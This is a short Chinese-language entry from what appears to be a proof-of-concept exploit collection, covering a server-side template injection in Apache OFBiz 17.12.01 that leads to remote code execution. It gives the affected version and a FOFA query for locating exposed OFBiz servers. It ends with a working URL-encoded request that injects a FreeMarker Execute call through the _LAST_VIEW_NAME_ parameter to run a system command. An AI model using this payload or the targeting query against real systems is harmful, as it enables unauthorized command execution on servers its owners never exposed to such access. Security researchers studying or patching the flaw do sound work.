Awesome-POC/开发框架漏洞/Apache OfBiz 服务器端模板注入 SSTI.md
2022-12-05 17:54:08 +08:00

35 lines
831 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache OfBiz 服务器端模板注入 SSTI
## 漏洞描述
Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI的影响从而导致远程代码执行RCE
参考链接:
- https://securitylab.github.com/advisories/GHSL-2020-067-apache_ofbiz
## 漏洞影响
```
Apache OfBiz 17.12.01
```
## FOFA
```
app="Apache_OFBiz"
```
## 漏洞复现
服务器端模板注入 renderLookupField
从不可信数据流request.getParameter("`_LAST_VIEW_NAME_`")给一个FreeMarker的宏调用定义。具有特权以渲染任何包含查找字段的页面的攻击者将能够通过发送有效载荷来执行任意系统命令。
poc
```
https://localhost:8443/ordermgr/control/FindQuote?_LAST_VIEW_NAME_=%22%2F%3E%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D%3CFOO
```